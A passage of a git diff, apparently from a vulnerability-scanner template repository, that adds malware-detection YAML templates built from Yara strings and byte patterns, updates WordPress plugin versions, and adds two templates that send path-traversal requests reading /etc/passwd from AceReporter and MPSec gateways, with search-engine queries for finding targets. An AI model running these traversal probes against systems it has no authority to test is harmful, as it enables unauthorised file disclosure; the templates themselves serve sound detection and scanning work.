Mining on:" + - "BK: Hard Bot Killer Ran Successfully!" + - "Uploaded Keylogs Successfully!" + - "No Slowloris Attack is Running!" + - "An ARME Attack is Already Running on" + - "Proactive Bot Killer Enabled!" + - "PlasmaRAT" + - "AntiEverything" + condition: and \ No newline at end of file diff --git a/file/malware/poetrat-malware.yaml b/file/malware/poetrat-malware.yaml new file mode 100644 index 0000000000..bdc0827515 --- /dev/null +++ b/file/malware/poetrat-malware.yaml @@ -0,0 +1,34 @@ +id: poetrat-malware + +info: + name: PoetRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_PoetRATDoc.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "launcher.py" + - "smile.zip" + - "smile_funs.py" + - "frown.py" + - "backer.py" + - "smile.py" + - "affine.py" + - "cmd" + - ".exe" + condition: and + + - type: regex + regex: + - '(\.py$|\.pyc$|\.pyd$|Python)' + - '\.dll' + condition: and \ No newline at end of file diff --git a/file/malware/pony-malware.yaml b/file/malware/pony-malware.yaml new file mode 100644 index 0000000000..f919ab5a80 --- /dev/null +++ b/file/malware/pony-malware.yaml @@ -0,0 +1,22 @@ +id: pony-malware + +info: + name: Pony Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Pony.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" + - "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0" + - "POST %s HTTP/1.0" + - "Accept-Encoding: identity, *;q=0" + condition: and \ No newline at end of file diff --git a/file/malware/pubsab-malware.yaml b/file/malware/pubsab-malware.yaml new file mode 100644 index 0000000000..ade33db854 --- /dev/null +++ b/file/malware/pubsab-malware.yaml @@ -0,0 +1,26 @@ +id: pubsab-malware + +info: + name: PubSab Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PubSab.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "_deamon_init" + - "com.apple.PubSabAgent" + - "/tmp/screen.jpeg" + condition: or + + - type: binary + binary: + - "6B45E43789CA29C28955E4" \ No newline at end of file diff --git a/file/malware/punisher-malware.yaml b/file/malware/punisher-malware.yaml new file mode 100644 index 0000000000..45b9c0c608 --- /dev/null +++ b/file/malware/punisher-malware.yaml @@ -0,0 +1,30 @@ +id: punisher-malware + +info: + name: Punisher Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "abccba" + - "SpyTheSpy" + - "wireshark" + - "apateDNS" + - "abccbaDanabccb" + condition: and + + - type: binary + binary: + - "5C006800660068002E007600620073" + - "5C00730063002E007600620073" + condition: and \ No newline at end of file diff --git a/file/malware/pypi-malware.yaml b/file/malware/pypi-malware.yaml new file mode 100644 index 0000000000..a03e0c6773 --- /dev/null +++ b/file/malware/pypi-malware.yaml @@ -0,0 +1,23 @@ +id: pypi-malware + +info: + name: Fake PyPI Malware - Detect + author: daffainfo + severity: info + reference: + - http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PyPI.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "# Welcome Here! :)" + - "# just toy, no harm :)" + - "[0x76,0x21,0xfe,0xcc,0xee]" + condition: and \ No newline at end of file diff --git a/file/malware/pythorat-malware.yaml b/file/malware/pythorat-malware.yaml new file mode 100644 index 0000000000..e5fb6642a4 --- /dev/null +++ b/file/malware/pythorat-malware.yaml @@ -0,0 +1,26 @@ +id: pythorat-malware + +info: + name: PythoRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "TKeylogger" + - "uFileTransfer" + - "TTDownload" + - "SETTINGS" + - "Unknown" + - "#@#@#" + - "PluginData" + - "OnPluginMessage" + condition: and diff --git a/file/malware/qrat-malware.yaml b/file/malware/qrat-malware.yaml new file mode 100644 index 0000000000..76853066d2 --- /dev/null +++ b/file/malware/qrat-malware.yaml @@ -0,0 +1,49 @@ +id: qrat-malware + +info: + name: QRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "quaverse/crypter" + - "Qrypt.class" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + part: raw + words: + - "e-data" + - "Qrypt.class" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + words: + - "e-data" + - "quaverse/crypter" + - "Jarizer.class" + - "URLConnection.class" + condition: and + + - type: word + part: raw + words: + - "e-data" + - "quaverse/crypter" + - "Qrypt.class" + - "URLConnection.class" + condition: and diff --git a/file/malware/satana-dropper-malware.yaml b/file/malware/satana-dropper-malware.yaml new file mode 100644 index 0000000000..c82a39dc6c --- /dev/null +++ b/file/malware/satana-dropper-malware.yaml @@ -0,0 +1,20 @@ +id: satana-dropper-malware + +info: + name: Satana Dropper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "25732D547279457863657074" + - "643A5C6C626574776D77795C75696A657571706C667775622E706462" + - "71666E7476746862" + condition: and \ No newline at end of file diff --git a/file/malware/satana-malware.yaml b/file/malware/satana-malware.yaml new file mode 100644 index 0000000000..01e87bbeec --- /dev/null +++ b/file/malware/satana-malware.yaml @@ -0,0 +1,28 @@ +id: satana-malware + +info: + name: Satana Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: binary + binary: + - "210073006100740061006E00610021002E0074007800740000" + - "456E756D4C6F63616C526573" + - "574E65744F70656E456E756D5700" + - "21534154414E4121" + condition: and + + - type: binary + binary: + - "7467777975677771" + - "537776776E6775" + condition: or \ No newline at end of file diff --git a/file/malware/shimrat-malware.yaml b/file/malware/shimrat-malware.yaml new file mode 100644 index 0000000000..3a75f5be23 --- /dev/null +++ b/file/malware/shimrat-malware.yaml @@ -0,0 +1,42 @@ +id: shimrat-malware + +info: + name: ShimRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - ".dll" + - ".dat" + - "QWERTYUIOPLKJHG" + - "MNBVCXZLKJHGFDS" + condition: and + + - type: word + part: raw + words: + - "Data$$00" + - "Data$$01%c%sData" + condition: and + + - type: word + part: raw + words: + - "ping localhost -n 9 /c %s > nul" + - "Demo" + - "Win32App" + - "COMSPEC" + - "ShimMain" + - "NotifyShims" + - "GetHookAPIs" + condition: and \ No newline at end of file diff --git a/file/malware/shimratreporter-malware.yaml b/file/malware/shimratreporter-malware.yaml new file mode 100644 index 0000000000..98d2b9a06c --- /dev/null +++ b/file/malware/shimratreporter-malware.yaml @@ -0,0 +1,30 @@ +id: shimratreporter-malware + +info: + name: ShimRatReporter Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "IP-INFO" + - "Network-INFO" + - "OS-INFO" + - "Process-INFO" + - "Browser-INFO" + - "QueryUser-INFO" + - "Users-INFO" + - "Software-INFO" + - "%02X-%02X-%02X-%02X-%02X-%02X" + - "(from environment) = %s" + - "NetUserEnum" + - "GetNetworkParams" + condition: and diff --git a/file/malware/sigma-malware.yaml b/file/malware/sigma-malware.yaml new file mode 100644 index 0000000000..70eca55e9b --- /dev/null +++ b/file/malware/sigma-malware.yaml @@ -0,0 +1,27 @@ +id: sigma-malware + +info: + name: Sigma Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Sigma.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - ".php?" + - "uid=" + - "&uname=" + - "&os=" + - "&pcname=" + - "&total=" + - "&country=" + - "&network=" + - "&subid=" + condition: and \ No newline at end of file diff --git a/file/malware/smallnet-malware.yaml b/file/malware/smallnet-malware.yaml new file mode 100644 index 0000000000..80cf24245b --- /dev/null +++ b/file/malware/smallnet-malware.yaml @@ -0,0 +1,28 @@ +id: smallnet-malware + +info: + name: SmallNet Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "!!<3SAFIA<3!!" + - "!!ElMattadorDz!!" + condition: or + + - type: word + part: raw + words: + - "stub_2.Properties" + - "stub.exe" + - "get_CurrentDomain" + condition: and \ No newline at end of file diff --git a/file/malware/snake-malware.yaml b/file/malware/snake-malware.yaml new file mode 100644 index 0000000000..5940273e81 --- /dev/null +++ b/file/malware/snake-malware.yaml @@ -0,0 +1,25 @@ +id: snake-malware + +info: + name: Snake Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Snake.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "Go build ID: \"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\"" + + - type: binary + binary: + - "89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF" + - "648B0D140000008B89000000003B61080F863801000083EC3CE8321AF3FF8D7C242889E6E825EAF0FF8B44242C8B4C242889C2C1E81FC1E01F85C00F84FC000000D1E289CBC1E91F09D189DAD1E3C1EB1F89CDD1E109D989CB81C1807FB1D7C1ED1F81C3807FB1D783D50D89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF31C0EB79894424208B4C24408D14C18B1A895C24248B52048954241CC7042405000000E848FEFFFF8B4424088B4C2404C70424000000008B542424895424048B5C241C895C2408894C240C89442410E8ECDDEFFF8B4424188B4C2414894C24088944240C8B4424248904248B44241C89442404E868BBF3FF8B44242040" + condition: and \ No newline at end of file diff --git a/file/malware/sub7nation-malware.yaml b/file/malware/sub7nation-malware.yaml new file mode 100644 index 0000000000..9336dd7bbe --- /dev/null +++ b/file/malware/sub7nation-malware.yaml @@ -0,0 +1,31 @@ +id: sub7nation-malware + +info: + name: Sub7Nation Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "EnableLUA /t REG_DWORD /d 0 /f" + - "*A01*" + - "*A02*" + - "*A03*" + - "*A04*" + - "*A05*" + - "*A06*" + - "#@#@#" + - "HostSettings" + - "sevane.tmp" + - "cmd_.bat" + - "a2b7c3d7e4" + - "cmd.dll" + condition: and diff --git a/file/malware/t5000-malware.yaml b/file/malware/t5000-malware.yaml new file mode 100644 index 0000000000..a3fc68f0e0 --- /dev/null +++ b/file/malware/t5000-malware.yaml @@ -0,0 +1,32 @@ +id: t5000-malware + +info: + name: T5000 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_T5000.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "_tmpR.vbs" + - "_tmpg.vbs" + - "Dtl.dat" + - "3C6FB3CA-69B1-454f-8B2F-BD157762810E" + - "EED5CA6C-9958-4611-B7A7-1238F2E1B17E" + - "8A8FF8AD-D1DE-4cef-B87C-82627677662E" + - "43EE34A9-9063-4d2c-AACD-F5C62B849089" + - "A8859547-C62D-4e8b-A82D-BE1479C684C9" + - "A59CF429-D0DD-4207-88A1-04090680F714" + - "utd_CE31" + - "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb" + - "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb" + - "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb" + - "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb" + condition: or \ No newline at end of file diff --git a/file/malware/tedroo-malware.yaml b/file/malware/tedroo-malware.yaml new file mode 100644 index 0000000000..0ca935a0c8 --- /dev/null +++ b/file/malware/tedroo-malware.yaml @@ -0,0 +1,19 @@ +id: tedroo-malware + +info: + name: Tedroo Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Tedroo.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "257325732E657865" + - "5F6C6F672E747874" + condition: and \ No newline at end of file diff --git a/file/malware/terminator-malware.yaml b/file/malware/terminator-malware.yaml new file mode 100644 index 0000000000..82645aa4c9 --- /dev/null +++ b/file/malware/terminator-malware.yaml @@ -0,0 +1,20 @@ +id: terminator-malware + +info: + name: Terminator Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Terminator.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Accelorator" + - "12356" + condition: and diff --git a/file/malware/teslacrypt-malware.yaml b/file/malware/teslacrypt-malware.yaml new file mode 100644 index 0000000000..b89352ca1a --- /dev/null +++ b/file/malware/teslacrypt-malware.yaml @@ -0,0 +1,17 @@ +id: teslacrypt-malware + +info: + name: TeslaCrypt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_TeslaCrypt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "4E6F7720697427732025493A254D25702E00000076616C2069732025640A0000" diff --git a/file/malware/tox-malware.yaml b/file/malware/tox-malware.yaml new file mode 100644 index 0000000000..fb71d2c6d2 --- /dev/null +++ b/file/malware/tox-malware.yaml @@ -0,0 +1,35 @@ +id: tox-malware + +info: + name: Tox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Tox.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" + condition: and + + - type: word + part: raw + words: + - "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<" + condition: and \ No newline at end of file diff --git a/file/malware/treasurehunt-malware.yaml b/file/malware/treasurehunt-malware.yaml new file mode 100644 index 0000000000..c47c1fa499 --- /dev/null +++ b/file/malware/treasurehunt-malware.yaml @@ -0,0 +1,23 @@ +id: treasurehunt-malware + +info: + name: Trickbot Malware - Detect + author: daffainfo + severity: info + reference: + - http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TreasureHunt.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "treasureHunter.pdb" + - "jucheck" + - "cmdLineDecrypted" + condition: and \ No newline at end of file diff --git a/file/malware/trickbot-malware.yaml b/file/malware/trickbot-malware.yaml new file mode 100644 index 0000000000..8952cddcb8 --- /dev/null +++ b/file/malware/trickbot-malware.yaml @@ -0,0 +1,23 @@ +id: trickbot-malware + +info: + name: Trickbot Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TrickBot.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "moduleconfig" + - "Start" + - "Control" + - "FreeBuffer" + - "Release" + condition: and \ No newline at end of file diff --git a/file/malware/trumpbot-malware.yaml b/file/malware/trumpbot-malware.yaml new file mode 100644 index 0000000000..d940cf10c1 --- /dev/null +++ b/file/malware/trumpbot-malware.yaml @@ -0,0 +1,20 @@ +id: trumpbot-malware + +info: + name: TrumpBot Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Trumpbot.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "trumpisdaddy" + - "198.50.154.188" + condition: and \ No newline at end of file diff --git a/file/malware/universal-1337-malware.yaml b/file/malware/universal-1337-malware.yaml new file mode 100644 index 0000000000..939e130630 --- /dev/null +++ b/file/malware/universal-1337-malware.yaml @@ -0,0 +1,26 @@ +id: universal-1337-malware + +info: + name: Universal 1337 Stealer Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Stealer.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: binary + binary: + - "2A5B532D502D4C2D492D545D2A" + - "2A5B482D452D522D455D2A" + condition: and + + - type: binary + binary: + - "4654507E" + - "7E317E317E307E30" + condition: and \ No newline at end of file diff --git a/file/malware/unrecom-malware.yaml b/file/malware/unrecom-malware.yaml new file mode 100644 index 0000000000..5a5ea9b335 --- /dev/null +++ b/file/malware/unrecom-malware.yaml @@ -0,0 +1,23 @@ +id: unrecom-malware + +info: + name: Unrecom Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "META-INF" + - "load/ID" + - "load/JarMain.class" + - "load/MANIFEST.MF" + - "plugins/UnrecomServer.class" + condition: and diff --git a/file/malware/urausy-malware.yaml b/file/malware/urausy-malware.yaml new file mode 100644 index 0000000000..a412bb4f7b --- /dev/null +++ b/file/malware/urausy-malware.yaml @@ -0,0 +1,24 @@ +id: urausy-malware + +info: + name: Urausy Skype Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Urausy.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "skype.dat" + - "skype.ini" + - "CreateWindow" + - "YIWEFHIWQ" + - "CreateDesktop" + - "MyDesktop" + condition: and \ No newline at end of file diff --git a/file/malware/vertex-malware.yaml b/file/malware/vertex-malware.yaml new file mode 100644 index 0000000000..b4e68411c8 --- /dev/null +++ b/file/malware/vertex-malware.yaml @@ -0,0 +1,26 @@ +id: vertex-malware + +info: + name: Vertex Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "DEFPATH" + - "HKNAME" + - "HPORT" + - "INSTALL" + - "IPATH" + - "MUTEX" + - "PANELPATH" + - "ROOTURL" + condition: and diff --git a/file/malware/virusrat-malware.yaml b/file/malware/virusrat-malware.yaml new file mode 100644 index 0000000000..2cdabae5cd --- /dev/null +++ b/file/malware/virusrat-malware.yaml @@ -0,0 +1,30 @@ +id: virusrat-malware + +info: + name: VirusRat Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "virustotal" + - "virusscan" + - "abccba" + - "pronoip" + - "streamWebcam" + - "DOMAIN_PASSWORD" + - "Stub.Form1.resources" + - "ftp://{0}@{1}" + - "SELECT * FROM moz_logins" + - "SELECT * FROM moz_disabledHosts" + - "DynDNS\\Updater\\config.dyndns" + - "|BawaneH|" + condition: and diff --git a/file/malware/wabot-malware.yaml b/file/malware/wabot-malware.yaml new file mode 100644 index 0000000000..cabadc8dae --- /dev/null +++ b/file/malware/wabot-malware.yaml @@ -0,0 +1,19 @@ +id: wabot-malware + +info: + name: Warp Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Wabot.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "433A5C6D6172696A75616E612E747874" + - "7349524334" + condition: and \ No newline at end of file diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml new file mode 100644 index 0000000000..2dd06313d1 --- /dev/null +++ b/file/malware/warp-malware.yaml @@ -0,0 +1,26 @@ +id: warp-malware + +info: + name: Warp Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Warp.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/2011/n325423.shtml?" + - "wyle" + - "\\~ISUN32.EXE" + condition: or + + - type: binary + binary: + - "80382B7503C6002D80382F7503C6005F" \ No newline at end of file diff --git a/file/malware/xhide-malware.yaml b/file/malware/xhide-malware.yaml new file mode 100644 index 0000000000..daba5648b1 --- /dev/null +++ b/file/malware/xhide-malware.yaml @@ -0,0 +1,20 @@ +id: xhide-malware + +info: + name: xHide Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XHide.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'XHide - Process Faker' + - 'Fakename: %s PidNum: %d' + condition: and \ No newline at end of file diff --git a/file/malware/xor-ddos-malware.yaml b/file/malware/xor-ddos-malware.yaml new file mode 100644 index 0000000000..5a0f709812 --- /dev/null +++ b/file/malware/xor-ddos-malware.yaml @@ -0,0 +1,25 @@ +id: xor-ddos-malware + +info: + name: XOR_DDosv1 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XOR_DDos.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "BB2FA36AAA9541F0" + - "md5=" + - "denyip=" + - "filename=" + - "rmfile=" + - "exec_packet" + - "build_iphdr" + condition: and \ No newline at end of file diff --git a/file/malware/yayih-malware.yaml b/file/malware/yayih-malware.yaml new file mode 100644 index 0000000000..7528720747 --- /dev/null +++ b/file/malware/yayih-malware.yaml @@ -0,0 +1,27 @@ +id: yayih-malware + +info: + name: Yayih Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Yayih.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "/bbs/info.asp" + - "\\msinfo.exe" + - "%s\\%srcs.pdf" + - "\\aumLib.ini" + condition: or + + - type: binary + binary: + - "8004087A03C18B45FC8034081903C1413B0A7CE9" \ No newline at end of file diff --git a/file/malware/zeghost-malware.yaml b/file/malware/zeghost-malware.yaml new file mode 100644 index 0000000000..e5ab80c5f5 --- /dev/null +++ b/file/malware/zeghost-malware.yaml @@ -0,0 +1,19 @@ +id: zeghost-malware + +info: + name: Zegost Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Zegost.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - '392F6633304C693575624F35444E414444784738733736327471593D' + - '00BADA2251426F6D6500' + condition: and diff --git a/file/malware/zoxpng-malware.yaml b/file/malware/zoxpng-malware.yaml new file mode 100644 index 0000000000..caac47273a --- /dev/null +++ b/file/malware/zoxpng-malware.yaml @@ -0,0 +1,18 @@ +id: zoxpng-malware + +info: + name: ZoxPNG Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_ZoxPNG.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58" diff --git a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt index 804440660c..fb467b1573 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt @@ -1 +1 @@ -5.2.1 \ No newline at end of file +5.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index 9b4bab7a7e..ac301e4f5c 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.7.7 \ No newline at end of file +5.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-sitemap-generator.txt b/helpers/wordpress/plugins/google-sitemap-generator.txt index 8ead3a843b..068399f864 100644 --- a/helpers/wordpress/plugins/google-sitemap-generator.txt +++ b/helpers/wordpress/plugins/google-sitemap-generator.txt @@ -1 +1 @@ -4.1.12 \ No newline at end of file +4.1.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/health-check.txt b/helpers/wordpress/plugins/health-check.txt index ce6a70b9d8..9dbb0c0052 100644 --- a/helpers/wordpress/plugins/health-check.txt +++ b/helpers/wordpress/plugins/health-check.txt @@ -1 +1 @@ -1.6.0 \ No newline at end of file +1.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index dd9db9fc5d..7d8ebf9eef 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.1.8 \ No newline at end of file +3.1.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kirki.txt b/helpers/wordpress/plugins/kirki.txt index ef8d7569d6..28cbf7c0aa 100644 --- a/helpers/wordpress/plugins/kirki.txt +++ b/helpers/wordpress/plugins/kirki.txt @@ -1 +1 @@ -4.2.0 \ No newline at end of file +5.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index 391e98560b..13d683ccbf 100644 --- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -2.9.2 \ No newline at end of file +3.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index e9cd0519b8..d873c4a3df 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.88 \ No newline at end of file +0.9.89 \ No newline at end of file diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml new file mode 100644 index 0000000000..53393e1c4f --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-41972.yaml @@ -0,0 +1,43 @@ +id: CNVD-2021-41972 + +info: + name: AceNet AceReporter Report - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + All firewall devices that use the AceNet AceReporter report component can download arbitrary files + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 + - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt + metadata: + max-request: 1 + verified: true + fofa-query: body="Login @ Reporter" + shodan-query: http.favicon.hash:-1595726841 + tags: cnvd,cnvd2021,acenet,acereporter,lfi + +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - 'filename=' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml new file mode 100644 index 0000000000..f1b631ec1f --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-43984.yaml @@ -0,0 +1,39 @@ +id: CNVD-2021-43984 + +info: + name: MPSec ISG1000 Security Gateway - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information. + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984 + - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml + metadata: + max-request: 1 + verified: true + fofa-query: "迈普通信技术股份有限公司" + tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg + +http: + - method: GET + path: + - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + 